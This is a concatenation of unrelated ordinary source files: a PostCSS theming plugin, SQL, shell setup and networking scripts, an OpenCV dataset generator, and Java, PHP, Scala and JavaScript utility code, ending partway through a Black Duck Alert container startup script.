JSON with the themify rules, in the following form: * themify(primary-100, 0.5) => %[light,primary-100,0.5)% * @param root */ function processFallbackRules(root) { // an output for each execution mode const output = { [ExecutionMode.CSS_COLOR]: [], [ExecutionMode.DYNAMIC_EXPRESSION]: {} }; // initialize DYNAMIC_EXPRESSION with all existing variations variationValues.forEach(variation => (output[ExecutionMode.DYNAMIC_EXPRESSION][variation] = [])); // define which modes need to be processed const execModes = [ExecutionMode.CSS_COLOR, ExecutionMode.DYNAMIC_EXPRESSION]; walkFallbackAtRules(root, execModes, output); walkFallbackRules(root, execModes, output); writeFallbackCSS(output); } function writeFallbackCSS(output) { // write the CSS & JSON to external files if (output[ExecutionMode.CSS_COLOR].length) { // write CSS fallback; const fallbackCss = output[ExecutionMode.CSS_COLOR].join(''); writeToFile(options.fallback.cssPath as string, minifyCSS(fallbackCss)); // creating a JSON for the dynamic expressions const jsonOutput = {}; variationValues.forEach(variationName => { jsonOutput[variationName] = output[ExecutionMode.DYNAMIC_EXPRESSION][variationName] || []; jsonOutput[variationName] = minifyJSON(jsonOutput[variationName].join('')); // minify the CSS output jsonOutput[variationName] = minifyCSS(jsonOutput[variationName]); }); // stringify and save const dynamicCss = JSON.stringify(jsonOutput); writeToFile(options.fallback.dynamicPath as string, dynamicCss); } } function walkFallbackAtRules(root, execModes, output) { root.walkAtRules(atRule => { if (atRule.nodes && hasThemify(atRule.toString())) { execModes.forEach(mode => { const clonedAtRule = atRule.clone(); clonedAtRule.nodes.forEach(rule => { rule.walkDecls(decl => { const propertyValue = decl.value; // replace the themify token, if exists if (hasThemify(propertyValue)) { const colorMap = getThemifyValue(propertyValue, mode); decl.value = colorMap[defaultVariation]; } }); }); let rulesOutput = mode === ExecutionMode.DYNAMIC_EXPRESSION ? output[mode][defaultVariation] : output[mode]; rulesOutput.push(clonedAtRule); }); } }); } function walkFallbackRules(root, execModes, output) { root.walkRules(rule => { if (isAtRule(rule) || !hasThemify(rule.toString())) { return; } const ruleModeMap = {}; rule.walkDecls(decl => { const propertyValue = decl.value; if (!hasThemify(propertyValue)) return; const property = decl.prop; execModes.forEach(mode => { const colorMap = getThemifyValue(propertyValue, mode); // lazily creating a new rule for each variation, for the specific mode if (!ruleModeMap.hasOwnProperty(mode)) { ruleModeMap[mode] = {}; variationValues.forEach(variationName => { let newRule; if (variationName === defaultVariation) { newRule = cloneEmptyRule(rule); } else { newRule = createRuleWithVariation(rule, variationName); } // push the new rule into the right place, // so we can write them later to external file let rulesOutput = mode === ExecutionMode.DYNAMIC_EXPRESSION ? output[mode][variationName] : output[mode]; rulesOutput.push(newRule); ruleModeMap[mode][variationName] = newRule; }); } // create and append a new declaration variationValues.forEach(variationName => { const underlineColor = colorMap[variationName]; if (underlineColor && underlineColor !== 'null') { const newDecl = createDecl(property, colorMap[variationName]); ruleModeMap[mode][variationName].append(newDecl); } }); }); }); }); } function createDecl(prop, value) { return postcss.decl({ prop, value }); } /** * check if there's a themify keyword in this declaration * @param propertyValue */ function hasThemify(propertyValue) { return propertyValue.indexOf(THEMIFY) > -1; } /** * Create a new rule for the given variation, out of the original rule * @param rule * @param variationName */ function createRuleWithVariation(rule, variationName) { const selector = getSelectorName(rule, variationName); return postcss.rule({ selector }); } /** * Get a selector name for the given rule and variation * @param rule * @param variationName */ function getSelectorName(rule, variationName) { const selectorPrefix = `.${options.classPrefix || ''}${variationName}`; return rule.selectors .map(selector => { return `${selectorPrefix} ${selector}`; }) .join(','); } function cloneEmptyRule(rule, overrideConfig?) { const clonedRule = rule.clone(overrideConfig); // remove all the declaration from this rule clonedRule.removeAll(); return clonedRule; } } /** * Generating a SASS definition file with the palette map and the CSS variables. * This file should be injected into your bundle. */ function init(options) { options = buildOptions(options); return root => { const palette = options.palette; const css = generateVars(palette, options.classPrefix); const parsedCss = postcss.parse(css); root.prepend(parsedCss); }; /** * This function responsible for creating the CSS variable. * * The output should look like the following: * * .light { --primary-700: 255, 255, 255; --primary-600: 248, 248, 249; --primary-500: 242, 242, 244; * } * * .dark { --primary-700: 255, 255, 255; --primary-600: 248, 248, 249; --primary-500: 242, 242, 244; * } * */ function generateVars(palette, prefix) { let cssOutput = ''; prefix = prefix || ''; // iterate through the different variations Object.keys(palette).forEach(variationName => { const selector = variationName === ColorVariation.LIGHT ? ':root' : `.${prefix}${variationName}`; const variationColors = palette[variationName]; // make sure we got colors for this variation if (!variationColors) { throw new Error(`Expected map of colors for the variation name ${variationName}`); } const variationKeys = Object.keys(variationColors); // generate CSS variables const vars = variationKeys .map(varName => { return `--${varName}: ${getRgbaNumbers(variationColors[varName])};`; }) .join(' '); // concatenate the variables to the output const output = `${selector} {${vars}}`; cssOutput = `${cssOutput} ${output}`; }); // generate the $palette variable cssOutput += `$palette: ${JSToSass(palette)};`; return cssOutput; } } function hexToRgba(hex, alpha = 1): string { hex = hex.replace('#', ''); const r = parseInt(hex.length == 3 ? hex.slice(0, 1).repeat(2) : hex.slice(0, 2), 16); const g = parseInt(hex.length == 3 ? hex.slice(1, 2).repeat(2) : hex.slice(2, 4), 16); const b = parseInt(hex.length == 3 ? hex.slice(2, 3).repeat(2) : hex.slice(4, 6), 16); return 'rgba(' + r + ', ' + g + ', ' + b + ', ' + alpha + ')'; } module.exports = { initThemify: postcss.plugin('datoThemes', init), themify: postcss.plugin('datoThemes', themify) };
-- *************************************************************************** -- File: 11_3.sql -- -- Developed By TUSC -- -- Disclaimer: Neither Osborne/McGraw-Hill, TUSC, nor the author warrant -- that this source code is error-free. If any errors are -- found in this source code, please report them to TUSC at -- (630)960-2909 ext 1011 or <EMAIL>. -- *************************************************************************** SPOOL 11_3.lis SELECT object_name from dba_objects WHERE owner = 'SYS' AND object_type = 'PACKAGE' ORDER BY object_name; SPOOL OFF
#!/bin/sh # The MIT License # # Copyright (c) 2016 Jérémie DECOCK <jd.jdhp@gmail.com> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # SAFETY TESTS ################################################################ # TODO: assert "$(dirname "$0") == "$(pwd)" # ... # LOAD VARIABLES ############################################################## . ./meta.sh echo "AUTHOR_NAME: ${AUTHOR_NAME}" echo "AUTHOR_EMAIL: ${AUTHOR_EMAIL}" echo "AUTHOR_WEB_SITE: ${AUTHOR_WEB_SITE}" echo "COPYRIGHT_NOTICE: ${COPYRIGHT_NOTICE}" echo "PROJECT_INITIAL_DATE: ${PROJECT_INITIAL_DATE}" echo "PROJECT_SHORT_DESC: ${PROJECT_SHORT_DESC}" echo "PROJECT_NAME: ${PROJECT_NAME}" echo "PYTHON_PACKAGE_NAME: ${PYTHON_PACKAGE_NAME}" echo "PROJECT_GITHUB_ACCOUNT: ${PROJECT_GITHUB_ACCOUNT}" echo "PROJECT_GITHUB_REPOSITORY_NAME: ${PROJECT_GITHUB_REPOSITORY_NAME}" echo "PROJECT_GITHUB_URL ${PROJECT_GITHUB_URL}" echo "PROJECT_ISSUE_TRACKER_URL: ${PROJECT_ISSUE_TRACKER_URL}" echo "PROJECT_PYPI_URL: ${PROJECT_PYPI_URL}" echo "PROJECT_WEB_SITE_URL: ${PROJECT_WEB_SITE_URL}" echo "PROJECT_ONLINE_DOCUMENTATION_URL: ${PROJECT_ONLINE_DOCUMENTATION_URL}" echo "PROJECT_ONLINE_API_DOCUMENTATION_URL: ${PROJECT_ONLINE_API_DOCUMENTATION_URL}" # SETUP GIT ################################################################### #git remote rename origin skeleton #git remote add origin git@github.com:${PROJECT_GITHUB_ACCOUNT}/${PROJECT_GITHUB_REPOSITORY_NAME}.git #git push -u origin master #git submodule init #git submodule update # MAKE SUBSTITUTIONS ########################################################## sed -i "" \ -e "s/TODO_AUTHOR_NAME/${AUTHOR_NAME}/g" \ -e "s/TODO_AUTHOR_EMAIL/${AUTHOR_EMAIL}/g" \ -e "s TODO_AUTHOR_WEB_SITE ${AUTHOR_WEB_SITE} g" \ -e "s|TODO_COPYRIGHT_NOTICE|${COPYRIGHT_NOTICE}|g" \ -e "s|TODO_PROJECT_INITIAL_DATE|${PROJECT_INITIAL_DATE}|g" \ -e "s|TODO_PROJECT_SHORT_DESC|${PROJECT_SHORT_DESC}|g" \ -e "s;TODO_PROJECT_NAME;${PROJECT_NAME};g" \ -e "s/TODO_PYTHON_PACKAGE_NAME/${PYTHON_PACKAGE_NAME}/g" \ -e "s/TODO_PROJECT_GITHUB_ACCOUNT/${PROJECT_GITHUB_ACCOUNT}/g" \ -e "s/TODO_PROJECT_GITHUB_REPOSITORY_NAME/${PROJECT_GITHUB_REPOSITORY_NAME}/g" \ -e "s TODO_PROJECT_GITHUB_URL ${PROJECT_GITHUB_URL} g" \ -e "s TODO_PROJECT_ISSUE_TRACKER_URL ${PROJECT_ISSUE_TRACKER_URL} g" \ -e "s TODO_PROJECT_PYPI_URL ${PROJECT_PYPI_URL} g" \ -e "s TODO_PROJECT_WEB_SITE_URL ${PROJECT_WEB_SITE_URL} g" \ -e "s TODO_PROJECT_ONLINE_DOCUMENTATION_URL ${PROJECT_ONLINE_DOCUMENTATION_URL} g" \ -e "s TODO_PROJECT_ONLINE_API_DOCUMENTATION_URL ${PROJECT_ONLINE_API_DOCUMENTATION_URL} g" \ AUTHORS \ CHANGES.rst \ .gitlab-ci.yml \ .travis.yml \ environment.yml \ LICENSE \ meta.make \ README.rst \ setup.cfg \ docs/api.rst \ docs/conf.py \ docs/developer.rst \ docs/index.rst \ docs/init_sphinx.sh \ docs/intro.rst \ docs/make.bat \ docs/Makefile \ TODO_PYTHON_PACKAGE_NAME/__init__.py # FIX TITLES UNDERLINE LENGTH IN RESTRUCTUREDTEXT FILES ####################### PROJECT_NAME_UNDERLINE=$(echo "${PROJECT_NAME}" | tr '[:print:]' '=') sed -i "" \ -e "s/^====$/${PROJECT_NAME_UNDERLINE}/" \ README.rst sed -i "" \ -e "s/^====$/${PROJECT_NAME_UNDERLINE}/" \ docs/index.rst # RENAME THE ROOT PACKAGE DIRECTORY ########################################### mv -v TODO_PYTHON_PACKAGE_NAME "${PYTHON_PACKAGE_NAME}"
import cv2 import numpy as np def overlay_transparent(mainimage, overlay, x, y): background = mainimage.copy() background_width = background.shape[1] background_height = background.shape[0] maskBG = np.zeros([background_width, background_height, background.shape[2]], dtype = np.uint8) if x >= background_width or y >= background_height: return background h, w = overlay.shape[0], overlay.shape[1] if x + w > background_width: # w = background_width - x x = background_width - w overlay = overlay[:, :w] if y + h > background_height: # h = background_height - y y = background_height - h overlay = overlay[:h] if overlay.shape[2] < 4: overlay = np.concatenate( [ overlay, np.ones((overlay.shape[0], overlay.shape[1], 1), dtype = overlay.dtype) * 255 ], axis = 2, ) overlay_image = overlay[..., :3] mask = overlay[..., 3:] / 255.0 background[y:y+h, x:x+w] = (1.0 - mask) * background[y:y+h, x:x+w] + mask * overlay_image maskBG[y:y+h, x:x+w] = ((1.0 - mask) * maskBG[y:y+h, x:x+w] + mask * 255) return background, maskBG from random import randint import cv2 import numpy as np path_FG_BG = 'Output/FG_BG' path_mask_FG_BG = 'Output/mask_FG_BG' quadrantsX = [ 100, 0, 100, 0] quadrantsY = [ 100, 100, 0, 0] def makeCombinations( backgound, foreground, opDir, imageNo): fg_img_tiny = cv2.resize(foreground, (foreground.shape[0], foreground.shape[1]), interpolation = cv2.INTER_AREA) for i in range(0,2): x = randint(0, 199 - (fg_img_tiny.shape[0]%199)) y = randint(0, 199 - (fg_img_tiny.shape[1]%199)) fg_bg, masked = overlay_transparent(backgound, fg_img_tiny, x, y) imageNo = imageNo + 1 mask_grey = cv2.cvtColor(masked, cv2.COLOR_BGR2GRAY) cv2.imwrite(opDir+'/overlay/'+str(imageNo)+".jpg", fg_bg) cv2.imwrite(opDir+'/mask/'+str(imageNo)+".jpg", mask_grey) # cv2_imshow(fg_bg) # cv2_imshow(masked) fg_img_tiny = cv2.resize(foreground, (int(0.8*foreground.shape[0]), int(0.8*foreground.shape[1])), interpolation = cv2.INTER_AREA) for i in range(0,4): x = randint( quadrantsX[i%4], quadrantsX[i%4] + 99 - (fg_img_tiny.shape[0]%99) ) y = randint( quadrantsY[i%4], quadrantsY[i%4] + 99 - (fg_img_tiny.shape[1]%99)) fg_bg, masked = overlay_transparent(backgound, fg_img_tiny, x, y) imageNo = imageNo + 1 mask_grey = cv2.cvtColor(masked, cv2.COLOR_BGR2GRAY) cv2.imwrite(opDir+'/overlay/'+str(imageNo)+".jpg", fg_bg) cv2.imwrite(opDir+'/mask/'+str(imageNo)+".jpg", mask_grey) # cv2_imshow(fg_bg) # cv2_imshow(masked) fg_img_tiny = cv2.resize(foreground, (int(0.6*foreground.shape[0]), int(0.6*foreground.shape[1])), interpolation = cv2.INTER_AREA) for i in range(0,5): x = randint( quadrantsX[i%4], quadrantsX[i%4] + 99 - (fg_img_tiny.shape[0]%99) ) y = randint( quadrantsY[i%4], quadrantsY[i%4] + 99 - (fg_img_tiny.shape[1]%99) ) fg_bg, masked = overlay_transparent(backgound, fg_img_tiny, x, y) imageNo = imageNo + 1 mask_grey = cv2.cvtColor(masked, cv2.COLOR_BGR2GRAY) cv2.imwrite(opDir+'/overlay/'+str(imageNo)+".jpg", fg_bg) cv2.imwrite(opDir+'/mask/'+str(imageNo)+".jpg", mask_grey) # cv2_imshow(fg_bg) # cv2_imshow(masked) x = 100 - (int(fg_img_tiny.shape[0]/2)) y = 100 - (int(fg_img_tiny.shape[1]/2)) fg_bg, masked = overlay_transparent(backgound, fg_img_tiny, x, y) imageNo = imageNo + 1 mask_grey = cv2.cvtColor(masked, cv2.COLOR_BGR2GRAY) cv2.imwrite(opDir+'/overlay/'+str(imageNo)+".jpg", fg_bg) cv2.imwrite(opDir+'/mask/'+str(imageNo)+".jpg", mask_grey) # cv2_imshow(fg_bg) # cv2_imshow(masked) fg_img_tiny = cv2.resize(foreground, (int(0.5*foreground.shape[0]), int(0.5*foreground.shape[1])), interpolation = cv2.INTER_AREA) for i in range(0,5): x = randint( quadrantsX[i%4], quadrantsX[i%4] + 99 - (fg_img_tiny.shape[0]%99)) y = randint( quadrantsY[i%4], quadrantsY[i%4] + 99 - (fg_img_tiny.shape[1]%99)) fg_bg, masked = overlay_transparent(backgound, fg_img_tiny, x, y) imageNo = imageNo + 1 mask_grey = cv2.cvtColor(masked, cv2.COLOR_BGR2GRAY) cv2.imwrite(opDir+'/overlay/'+str(imageNo)+".jpg", fg_bg) cv2.imwrite(opDir+'/mask/'+str(imageNo)+".jpg", mask_grey) # cv2_imshow(fg_bg) # cv2_imshow(masked) x = 100 - (int(fg_img_tiny.shape[0]/2)) y = 100 - (int(fg_img_tiny.shape[1]/2)) fg_bg, masked = overlay_transparent(backgound, fg_img_tiny, x, y) imageNo = imageNo + 1 mask_grey = cv2.cvtColor(masked, cv2.COLOR_BGR2GRAY) cv2.imwrite(opDir+'/overlay/'+str(imageNo)+".jpg", fg_bg) cv2.imwrite(opDir+'/mask/'+str(imageNo)+".jpg", mask_grey) # cv2_imshow(fg_bg) # cv2_imshow(masked) fg_img_tiny = cv2.resize(foreground, (int(0.3*foreground.shape[0]), int(0.3*foreground.shape[1])), interpolation = cv2.INTER_AREA) for i in range(0,2): x = randint( quadrantsX[i%4], quadrantsX[i%4] + 99 - (fg_img_tiny.shape[0]%99)) y = randint( quadrantsY[i%4], quadrantsY[i%4] + 99 - (fg_img_tiny.shape[1]%99)) fg_bg, masked = overlay_transparent(backgound, fg_img_tiny, x, y) imageNo = imageNo + 1 mask_grey = cv2.cvtColor(masked, cv2.COLOR_BGR2GRAY) cv2.imwrite(opDir+'/overlay/'+str(imageNo)+".jpg", fg_bg) cv2.imwrite(opDir+'/mask/'+str(imageNo)+".jpg", mask_grey) # cv2_imshow(fg_bg) # cv2_imshow(masked) from os import listdir from DenseDepth.EVADepth import denseDepthModel # from google.colab.patches import cv2_imshow # import cv2 from matplotlib.pyplot import imshow import numpy as np from PIL import Image %matplotlib inline import os, errno path_BG = 'bg' path_FG = 'fg150' bg_imageListDir = listdir(path_BG) fg_imageListDir = listdir(path_FG) print(len(bg_imageListDir)) for bg_image in bg_imageListDir: print(bg_image) outputDir = 'Dataset/' outputDir = outputDir + bg_image[:-4] bg_img = Image.open(path_BG+'/'+bg_image).resize((224,224), Image.ANTIALIAS) print(bg_img.size) # cv2_imshow(bg_img) for fg_image in fg_imageListDir: fg_img = Image.open(path_FG+'/'+fg_image).resize((224,224), Image.ANTIALIAS) break break # outputDir1 = outputDir + '/' + fg_image[:-4] # try: # os.makedirs(outputDir1 + "/overlay") # os.makedirs(outputDir1 + "/mask") # os.makedirs(outputDir1 + "/depth") # except FileExistsError: # pass # makeCombinations( bg_img, fg_img, outputDir1, 0) # #Flip foreground # fg_img_flip = cv2.flip(fg_img, 1) # makeCombinations( bg_img, fg_img_flip, outputDir1, 20) # denseDepthModel( model, outputDir1 + '/overlay/*.jpg', outputDir1 + '/depth/')
import { ApolloServer } from 'apollo-server'; import { GraphQLSchema } from 'graphql'; import { defaultTestSchema } from './graphql-http-test-schema'; export class GraphQLHTTPTestEndpoint { private server: ApolloServer | undefined; public async start(port: number, schema?: GraphQLSchema) { const server = new ApolloServer({ schema: schema || defaultTestSchema }); await server.listen(port); console.log(`Test endpoint running on http://localhost:${port}/`) this.server = server; } public stop() { if (this.server) { this.server.stop(); this.server = undefined; } } }
shuf $1 > $1.shuf mv $1.shuf $1 for((i=0; i < 12; i++)) do awk 'NR%12==i' i="$i" $1 > $1_${i} done
<?php class BinarySearchTree { private $root; private $currNode; public function __construct($arr) { $this->root = $this->createTree($arr); } private function createTree($arr) { if (count($arr) == 0) return null; $mid = count($arr) >> 1; $node = new Node($arr[$mid]); $node->leftNode = $this->createTree(array_slice($arr, 0, $mid)); $node->rightNode = $this->createTree(array_slice($arr, $mid+1)); return $node; } } class Node { public $data; public $leftNode; public $rightNode; public function __construct($data) { $this->data = $data; $this->leftNode = null; $this->rightNode = null; } } $arr = [2, 4, 8, 10, 12, 14]; $bst = new BinarySearchTree($arr); ?>
python transformers/examples/language-modeling/run_language_modeling.py --model_name_or_path train-outputs/1024+0+512-shuffled-N-VB/7-model --tokenizer_name model-configs/1536-config --eval_data_file ../data/wikitext-103-raw/wiki.valid.raw --output_dir eval-outputs/1024+0+512-shuffled-N-VB/7-1024+0+512-N-IP-first-256 --do_eval --per_device_eval_batch_size 1 --dataloader_drop_last --augmented --augmentation_function replace_all_but_nouns_first_two_thirds_sixth --eval_function penultimate_sixth_eval
package cim4j; import java.util.List; import java.util.Map; import java.util.HashMap; import cim4j.BaseClass; import java.lang.ArrayIndexOutOfBoundsException; import java.lang.IllegalArgumentException; import cim4j.Date; /* Version details. */ public class TopologyVersion extends BaseClass { private BaseClass[] TopologyVersion_class_attributes; private BaseClass[] TopologyVersion_primitive_attributes; private java.lang.String rdfid; public void setRdfid(java.lang.String id) { rdfid = id; } private abstract interface PrimitiveBuilder { public abstract BaseClass construct(java.lang.String value); }; private enum TopologyVersion_primitive_builder implements PrimitiveBuilder { baseUML(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, baseURI(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, differenceModelURI(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, entsoeUML(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, entsoeURI(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, modelDescriptionURI(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, namespaceRDF(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, namespaceUML(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, shortName(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, LAST_ENUM() { public BaseClass construct (java.lang.String value) { return new cim4j.Integer("0"); } }; } private enum TopologyVersion_class_attributes_enum { baseUML, baseURI, date, differenceModelURI, entsoeUML, entsoeURI, modelDescriptionURI, namespaceRDF, namespaceUML, shortName, LAST_ENUM; } public TopologyVersion() { TopologyVersion_primitive_attributes = new BaseClass[TopologyVersion_primitive_builder.values().length]; TopologyVersion_class_attributes = new BaseClass[TopologyVersion_class_attributes_enum.values().length]; } public void updateAttributeInArray(TopologyVersion_class_attributes_enum attrEnum, BaseClass value) { try { TopologyVersion_class_attributes[attrEnum.ordinal()] = value; } catch (ArrayIndexOutOfBoundsException aoobe) { System.out.println("No such attribute: " + attrEnum.name() + ": " + aoobe.getMessage()); } } public void updateAttributeInArray(TopologyVersion_primitive_builder attrEnum, BaseClass value) { try { TopologyVersion_primitive_attributes[attrEnum.ordinal()] = value; } catch (ArrayIndexOutOfBoundsException aoobe) { System.out.println("No such attribute: " + attrEnum.name() + ": " + aoobe.getMessage()); } } public void setAttribute(java.lang.String attrName, BaseClass value) { try { TopologyVersion_class_attributes_enum attrEnum = TopologyVersion_class_attributes_enum.valueOf(attrName); updateAttributeInArray(attrEnum, value); System.out.println("Updated TopologyVersion, setting " + attrName); } catch (IllegalArgumentException iae) { super.setAttribute(attrName, value); } } /* If the attribute is a String, it is a primitive and we will make it into a BaseClass */ public void setAttribute(java.lang.String attrName, java.lang.String value) { try { TopologyVersion_primitive_builder attrEnum = TopologyVersion_primitive_builder.valueOf(attrName); updateAttributeInArray(attrEnum, attrEnum.construct(value)); System.out.println("Updated TopologyVersion, setting " + attrName + " to: " + value); } catch (IllegalArgumentException iae) { super.setAttribute(attrName, value); } } public java.lang.String toString(boolean topClass) { java.lang.String result = ""; java.lang.String indent = ""; if (topClass) { for (TopologyVersion_primitive_builder attrEnum: TopologyVersion_primitive_builder.values()) { BaseClass bc = TopologyVersion_primitive_attributes[attrEnum.ordinal()]; if (bc != null) { result += " TopologyVersion." + attrEnum.name() + "(" + bc.debugString() + ")" + " " + bc.toString(false) + System.lineSeparator(); } } for (TopologyVersion_class_attributes_enum attrEnum: TopologyVersion_class_attributes_enum.values()) { BaseClass bc = TopologyVersion_class_attributes[attrEnum.ordinal()]; if (bc != null) { result += " TopologyVersion." + attrEnum.name() + "(" + bc.debugString() + ")" + " " + bc.toString(false) + System.lineSeparator(); } } result += super.toString(true); } else { result += "(TopologyVersion) RDFID: " + rdfid; } return result; } public final java.lang.String debugName = "TopologyVersion"; public java.lang.String debugString() { return debugName; } public void setValue(java.lang.String s) { System.out.println(debugString() + " is not sure what to do with " + s); } public BaseClass construct() { return new TopologyVersion(); } };
#!/bin/sh set -e set -x FILE=$1 mkfifo "$FILE" TYPE=$(stat -c %F "$FILE") if [ "$TYPE" != "fifo" ]; then echo "$FILE is not a fifo: $TYPE != fifo" exit 1 fi
#!/bin/bash curl https://pkg.jenkins.io/debian/jenkins-ci.org.key | sudo apt-key add - sudo sh -c 'echo deb http://pkg.jenkins.io/debian-stable binary/ > /etc/apt/sources.list.d/jenkins.list' sudo apt-get -y update sudo apt-get -y install jenkins
#!/usr/bin/env bash ## Traffic going to the internet route add default gw 172.30.30.1 ## NAT iptables -t nat -A POSTROUTING -o enp0s8 -j MASQUERADE iptables -t nat -A PREROUTING -i enp0s8 -s 172.16.16.16 -j DNAT --to-destination 10.2.0.2 iptables -t nat -A PREROUTING -i enp0s8 -s 172.18.18.18 -j DNAT --to-destination 10.2.0.3 ## Save the iptables rules iptables-save > /etc/iptables/rules.v4 ip6tables-save > /etc/iptables/rules.v6
<gh_stars>0 object ParUnit { def par(a: =>Unit)(b: =>Unit) = { val r = new Runnable { def run() = a } val t = new Thread(r) t.start() b t.join() } }
#!/bin/sh docker-compose exec web python manage.py makemigrations --noinput
<reponame>nevans/capybara-chromedriver-logger module Capybara module Chromedriver module Logger class JsError < StandardError end end end end
// Copyright 2006, 2007, 2008, 2009, 2010 The Apache Software Foundation // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package org.apache.tapestry5.internal.services; import java.io.BufferedWriter; import java.io.IOException; import java.io.OutputStream; import java.io.OutputStreamWriter; import java.io.PrintWriter; import java.io.Writer; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import org.apache.tapestry5.Link; import org.apache.tapestry5.internal.InternalConstants; import org.apache.tapestry5.ioc.internal.util.InternalUtils; import org.apache.tapestry5.services.Response; /** * Implementation of {@link Response} that wraps around an underlying {@link HttpServletResponse}. */ public class ResponseImpl implements Response { private final HttpServletRequest request; private final HttpServletResponse response; public ResponseImpl(HttpServletRequest request, HttpServletResponse response) { assert request != null; assert response != null; this.request = request; this.response = response; } public PrintWriter getPrintWriter(String contentType) throws IOException { assert InternalUtils.isNonBlank(contentType); OutputStream os = getOutputStream(contentType); Writer w = new OutputStreamWriter(os, response.getCharacterEncoding()); return new PrintWriter(new BufferedWriter(w)); } public String encodeURL(String URL) { return response.encodeURL(URL); } public String encodeRedirectURL(String URL) { return response.encodeRedirectURL(URL); } public void sendRedirect(String URL) throws IOException { response.sendRedirect(URL); } public void sendRedirect(Link link) throws IOException { assert link != null; String redirectURL = encodeRedirectURL(link.toRedirectURI()); sendRedirect(redirectURL); } public void setStatus(int sc) { response.setStatus(sc); } public OutputStream getOutputStream(String contentType) throws IOException { assert InternalUtils.isNonBlank(contentType); response.setContentType(contentType); return response.getOutputStream(); } public void sendError(int sc, String message) throws IOException { response.sendError(sc, message); } public void setContentLength(int length) { response.setContentLength(length); } public void setDateHeader(String name, long date) { response.setDateHeader(name, date); } public void setHeader(String name, String value) { response.setHeader(name, value); } public void addHeader(String name, String value) { response.addHeader(name, value); } public void setIntHeader(String name, int value) { response.setIntHeader(name, value); } public boolean isCommitted() { return response.isCommitted(); } public void disableCompression() { request.setAttribute(InternalConstants.SUPPRESS_COMPRESSION, true); } }
<filename>challenges/sorting-algorithms/solutions/javascript/merge-sort/solution.js import readline from 'node:readline' const numbers = [] const readlineInterface = readline.createInterface({ input: process.stdin, output: process.stdout }) readlineInterface.on('line', (value) => { numbers.push(Number(value)) }) readlineInterface.on('close', solution) function solution() { const sortedNumbers = mergeSort(numbers.slice(1)) sortedNumbers.forEach((number) => { console.log(number) }) } function divideArray (numbers) { const middle = Math.round(numbers.length / 2) const left = numbers.slice(0, middle) const right = numbers.slice(middle) return [left, right] } function merge (numbers1, numbers2) { let indexNumbers1 = 0 let indexNumbers2 = 0 const result = [] while (indexNumbers1 < numbers1.length && indexNumbers2 < numbers2.length) { if (numbers1[indexNumbers1] < numbers2[indexNumbers2]) { result.push(numbers1[indexNumbers1]) indexNumbers1 += 1 } else { result.push(numbers2[indexNumbers2]) indexNumbers2 += 1 } } for (let index = indexNumbers1; index < numbers1.length; index++) { result.push(numbers1[index]) } for (let index = indexNumbers2; index < numbers2.length; index++) { result.push(numbers2[index]) } return result } function mergeSort (numbers) { if (numbers.length <= 1) { return numbers } let [left, right] = divideArray(numbers) left = mergeSort(left) right = mergeSort(right) return merge(left, right) }
#!/bin/sh certificateManagerDir=/opt/blackduck/alert/bin securityDir=/opt/blackduck/alert/security alertHome=/opt/blackduck/alert alertConfigHome=${alertHome}/alert-config alertDataDir=${alertConfigHome}/data alertDatabaseDir=${alertDataDir}/alertdb alertDatabaseHost="${ALERT_DB_HOST:-alertdb}" alertDatabasePort="${ALERT_DB_PORT:-5432}" alertDatabaseName="${ALERT_DB_NAME:-alertdb}" alertDatabaseUser="${ALERT_DB_USERNAME:-sa}" alertDatabasePassword="${ALERT_DB_PASSWORD:-blackduck}" alertDatabaseAdminUser="${ALERT_DB_ADMIN_USERNAME:-$alertDatabaseUser}" alertDatabaseAdminPassword="${ALERT_DB_ADMIN_PASSWORD:-$alertDatabasePassword}" alertDatabaseSslMode="${ALERT_DB_SSL_MODE:-allow}" alertDatabaseSslKey=${ALERT_DB_SSL_KEY} alertDatabaseSslCert=${ALERT_DB_SSL_CERT} alertDatabaseSslRootCert=${ALERT_DB_SSL_ROOT_CERT} upgradeResourcesDir=$alertHome/alert-tar/upgradeResources serverCertName=$APPLICATION_NAME-server dockerSecretDir=${RUN_SECRETS_DIR:-/run/secrets} keyStoreFile=$APPLICATION_NAME.keystore keystoreFilePath=$securityDir/$keyStoreFile keystorePassword="${ALERT_KEY_STORE_PASSWORD:-changeit}" truststoreFile=$securityDir/$APPLICATION_NAME.truststore truststorePassword="${ALERT_TRUST_STORE_PASSWORD:-changeit}" truststoreType="${ALERT_TRUST_STORE_TYPE:-JKS}" alertHostName="${ALERT_HOSTNAME:-localhost}" targetCAHost="${HUB_CFSSL_HOST:-cfssl}" targetCAPort="${HUB_CFSSL_PORT:-8888}" targetWebAppHost="${HUB_WEBAPP_HOST:-alert}" [ -z "$ALERT_HOSTNAME" ] && echo "Alert Host: [$alertHostName]. Wrong host name? Restart the container with the right host name configured in blackduck-alert.env" if [ -e 